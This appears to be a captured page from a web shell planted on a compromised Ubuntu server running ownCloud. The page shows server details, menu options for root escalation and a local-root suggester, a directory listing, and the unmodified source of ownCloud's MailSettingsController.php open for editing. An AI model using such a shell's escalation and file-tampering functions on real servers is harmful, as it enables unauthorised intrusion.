Linux anchor 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
Apache/2.4.18 (Ubuntu)
Server IP : 10.10.100.4 & Your IP : 216.73.217.150
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
owncloud-prm /
settings /
Controller /
Delete
Unzip
Name
Size
Permission
Date
Action
AppSettingsController.php
3.93
KB
-rw-r--r--
2018-04-19 18:15
AuthSettingsController.php
4.87
KB
-rw-r--r--
2018-04-19 18:15
CertificateController.php
5.67
KB
-rw-r--r--
2018-04-19 18:15
CheckSetupController.php
10.05
KB
-rw-r--r--
2018-04-19 18:15
CorsController.php
4.36
KB
-rw-r--r--
2018-04-19 18:15
EncryptionController.php
3.42
KB
-rw-r--r--
2018-04-19 18:15
GroupsController.php
3.67
KB
-rw-r--r--
2018-04-19 18:15
LogSettingsController.php
2.41
KB
-rw-r--r--
2018-04-19 18:15
MailSettingsController.php
4.94
KB
-rw-r--r--
2018-04-19 18:15
SettingsPageController.php
5.47
KB
-rw-r--r--
2018-04-19 18:15
UsersController.php
26.41
KB
-rw-r--r--
2018-04-19 18:15
Save
Rename
<?php /** * @author Joas Schilling <coding@schilljs.com> * @author Lukas Reschke <lukas@statuscode.ch> * @author Morris Jobke <hey@morrisjobke.de> * @author Thomas Müller <thomas.mueller@tmit.eu> * @author Ujjwal Bhardwaj <ujjwalb1996@gmail.com> * * @copyright Copyright (c) 2018, ownCloud GmbH * @license AGPL-3.0 * * This code is free software: you can redistribute it and/or modify * it under the terms of the GNU Affero General Public License, version 3, * as published by the Free Software Foundation. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU Affero General Public License for more details. * * You should have received a copy of the GNU Affero General Public License, version 3, * along with this program. If not, see <http://www.gnu.org/licenses/> * */ namespace OC\Settings\Controller; use OC\User\Session; use \OCP\AppFramework\Controller; use OCP\IRequest; use OCP\IL10N; use OCP\IConfig; use OCP\Mail\IMailer; /** * @package OC\Settings\Controller */ class MailSettingsController extends Controller { /** @var \OCP\IL10N */ private $l10n; /** @var \OCP\IConfig */ private $config; /** @var Session */ private $userSession; /** @var \OC_Defaults */ private $defaults; /** @var IMailer */ private $mailer; /** @var string */ private $defaultMailAddress; /** * @param string $appName * @param IRequest $request * @param IL10N $l10n * @param IConfig $config * @param Session $userSession * @param \OC_Defaults $defaults * @param IMailer $mailer * @param string $defaultMailAddress */ public function __construct($appName, IRequest $request, IL10N $l10n, IConfig $config, Session $userSession, \OC_Defaults $defaults, IMailer $mailer, $defaultMailAddress) { parent::__construct($appName, $request); $this->l10n = $l10n; $this->config = $config; $this->userSession = $userSession; $this->defaults = $defaults; $this->mailer = $mailer; $this->defaultMailAddress = $defaultMailAddress; } /** * Sets the email settings * @param string $mail_domain * @param string $mail_from_address * @param string $mail_smtpmode * @param string $mail_smtpsecure * @param string $mail_smtphost * @param string $mail_smtpauthtype * @param int $mail_smtpauth * @param string $mail_smtpport * @return array */ public function setMailSettings($mail_domain, $mail_from_address, $mail_smtpmode, $mail_smtpsecure, $mail_smtphost, $mail_smtpauthtype, $mail_smtpauth, $mail_smtpport) { $params = get_defined_vars(); $configs = []; foreach($params as $key => $value) { $configs[$key] = (empty($value)) ? null : $value; } if (!$this->mailer->validateMailAddress($mail_from_address . '@' . $mail_domain)) { return ['data' => ['message' => (string) $this->l10n->t('Invalid email address') ], 'status' => 'error' ]; } // Delete passwords from config in case no auth is specified if ($params['mail_smtpauth'] !== 1) { $configs['mail_smtpname'] = null; $configs['mail_smtppassword'] = null; } $this->config->setSystemValues($configs); return ['data' => ['message' => (string) $this->l10n->t('Saved') ], 'status' => 'success' ]; } /** * Store the credentials used for SMTP in the config * @param string $mail_smtpname * @param string $mail_smtppassword * @return array */ public function storeCredentials($mail_smtpname, $mail_smtppassword) { $this->config->setSystemValues([ 'mail_smtpname' => $mail_smtpname, 'mail_smtppassword' => $mail_smtppassword, ]); return ['data' => ['message' => (string) $this->l10n->t('Saved') ], 'status' => 'success' ]; } /** * Send a mail to test the settings * @return array */ public function sendTestMail() { $email = $this->userSession->getUser()->getEMailAddress(); if (!empty($email)) { try { $message = $this->mailer->createMessage(); $message->setTo([$email => $this->userSession->getUser()->getDisplayName()]); $message->setFrom([$this->defaultMailAddress]); $message->setSubject($this->l10n->t('test email settings')); $message->setPlainBody('If you received this email, the settings seem to be correct.'); $this->mailer->send($message); } catch (\Exception $e) { return [ 'data' => [ 'message' => (string) $this->l10n->t('A problem occurred while sending the email. Please revise your settings. (Error: %s)', [$e->getMessage()]), ], 'status' => 'error', ]; } return ['data' => ['message' => (string) $this->l10n->t('Email sent') ], 'status' => 'success' ]; } return ['data' => ['message' => (string) $this->l10n->t('You need to set your user email before being able to send test emails.'), ], 'status' => 'error' ]; } }